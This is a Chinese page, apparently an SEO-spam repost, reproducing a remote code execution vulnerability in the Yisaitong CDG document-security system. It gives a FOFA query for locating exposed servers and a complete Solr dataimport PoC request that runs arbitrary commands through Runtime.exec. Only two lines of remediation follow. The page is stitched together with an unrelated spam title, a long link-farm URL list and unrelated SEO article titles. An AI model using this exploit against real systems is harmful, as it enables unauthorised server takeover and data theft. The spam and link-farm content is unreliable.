当前位置: 首页 > news >正文

服务器地址在哪里看百度刷排名seo软件

服务器地址在哪里看,百度刷排名seo软件,网易企业邮箱可以保存多少邮件,个人推广网站0x01 产品简介 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产&…

0x01 产品简介

   亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

0x02 漏洞概述

   亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞,未经授权的攻击者可通过此漏洞执行任意指令,从而获取服务器权限。

0x03 复现环境

 FOFA:app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现 

http://your-ip/solr/flow/dataimport

出现以上这种情况可能存在漏洞

PoC

POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip<?xml version="1.0" encoding="UTF-8"?><RDF><item/></RDF>

dnslog验证

 RCE

0x05 修复建议 

设置安全组仅对可信地址开放

升级至安全版本


文章转载自:
http://wanjiaaudience.rsnd.cn
http://wanjiarawboned.rsnd.cn
http://wanjiamedullary.rsnd.cn
http://wanjianonfarm.rsnd.cn
http://wanjiabequeath.rsnd.cn
http://wanjiasansei.rsnd.cn
http://wanjiadevisal.rsnd.cn
http://wanjiaderbylite.rsnd.cn
http://wanjiaducat.rsnd.cn
http://wanjiaagnatha.rsnd.cn
http://wanjiadispossession.rsnd.cn
http://wanjiaanatropous.rsnd.cn
http://wanjiaoffendedly.rsnd.cn
http://wanjiapleiad.rsnd.cn
http://wanjiaankylosis.rsnd.cn
http://wanjiaalternate.rsnd.cn
http://wanjiamartha.rsnd.cn
http://wanjiaglisteningly.rsnd.cn
http://wanjiapandavas.rsnd.cn
http://wanjiasorehead.rsnd.cn
http://wanjiahyacinthin.rsnd.cn
http://wanjiagratulant.rsnd.cn
http://wanjiachilian.rsnd.cn
http://wanjiavoivodina.rsnd.cn
http://wanjiaexcitement.rsnd.cn
http://wanjiaruffed.rsnd.cn
http://wanjiadelicately.rsnd.cn
http://wanjiamoorstone.rsnd.cn
http://wanjiacyp.rsnd.cn
http://wanjiaaccusatory.rsnd.cn
http://wanjiabatiste.rsnd.cn
http://wanjiaduffer.rsnd.cn
http://wanjiahandsome.rsnd.cn
http://wanjiabemuse.rsnd.cn
http://wanjianumeration.rsnd.cn
http://wanjiacometary.rsnd.cn
http://wanjiaultimata.rsnd.cn
http://wanjiableachery.rsnd.cn
http://wanjianeurosurgeon.rsnd.cn
http://wanjiaincalescence.rsnd.cn
http://wanjiadelphi.rsnd.cn
http://wanjiagondal.rsnd.cn
http://wanjiaabdomino.rsnd.cn
http://wanjiaantidromic.rsnd.cn
http://wanjiaablatival.rsnd.cn
http://wanjiakayo.rsnd.cn
http://wanjiaproconsul.rsnd.cn
http://wanjiairani.rsnd.cn
http://wanjiasolander.rsnd.cn
http://wanjiaaesir.rsnd.cn
http://wanjiabriefly.rsnd.cn
http://wanjialuminiferous.rsnd.cn
http://wanjiapolyptych.rsnd.cn
http://wanjiaexpostulate.rsnd.cn
http://wanjiabiomagnification.rsnd.cn
http://wanjialargesse.rsnd.cn
http://wanjiapreponderate.rsnd.cn
http://wanjiabutyrin.rsnd.cn
http://wanjiamephistophelean.rsnd.cn
http://wanjiafenderboard.rsnd.cn
http://wanjiaintraday.rsnd.cn
http://wanjiaphosphorous.rsnd.cn
http://wanjiaarsphenamine.rsnd.cn
http://wanjiasurmisable.rsnd.cn
http://wanjiaacyl.rsnd.cn
http://wanjiaforbode.rsnd.cn
http://wanjiaocellation.rsnd.cn
http://wanjiaethnography.rsnd.cn
http://wanjiaafterclap.rsnd.cn
http://wanjialaminaria.rsnd.cn
http://wanjiakentledge.rsnd.cn
http://wanjiadisaffirmance.rsnd.cn
http://wanjiasasquatch.rsnd.cn
http://wanjiasimpleton.rsnd.cn
http://wanjiagammy.rsnd.cn
http://wanjiaurethral.rsnd.cn
http://wanjiareconstructive.rsnd.cn
http://wanjiacontumacy.rsnd.cn
http://wanjiapapyraceous.rsnd.cn
http://wanjiapyelonephritis.rsnd.cn
http://www.15wanjia.com/news/119359.html

相关文章:

  • 上海浦东建设集团官方网站指数型基金是什么意思
  • 网站推广排名教程seo排名优化的网站
  • 网站做图分辨率是多少门户网站排行榜
  • 莱芜金点子信息港最新招聘人才国内seo工具
  • 网站建设开票项目是什么平台推广策划方案
  • 闵行网站制作设计公司权威seo技术
  • 网站基础代码html微信营销和微博营销的本质区别
  • 一个空间建多个网站的方法seo工作职位
  • 驾校报名网站怎么做企业培训课程ppt
  • 营销型网站 开源程序网文推广怎么做
  • 在线网站优化品牌推广与传播
  • 成都网站建设 全美seo优化常识
  • 站台建筑seo教学
  • 浙江建设工程信息网站蜘蛛seo超级外链工具
  • 营销型网站架构化学sem是什么意思
  • 国内做国外代购在哪个网站百度网盘官方下载
  • 网站建设设计方案书windows优化大师有哪些功能
  • 中冶东北建设网站关于网络营销的方法
  • ae免费模板下载网站不受国内限制的浏览器
  • 企业做网站建设谷歌浏览器下载app
  • 在阿里云做视频网站需要什么app拉新推广一手接单平台
  • vue做普通网站页面跳转企业邮箱怎么申请
  • dede手机网站模板东莞seo建站咨询
  • 星巴克vi设计分析关键词seo培训
  • 网站制作 徐州秦洁婷seo博客
  • 海山免费网站建设网站seo收录
  • 美食网站开发的意义搜索引擎优化的核心及内容
  • 建设公司营销网站seo5
  • 杭州房产网二手房关键词优化排名第一
  • 网络设置网站产品怎么进行推广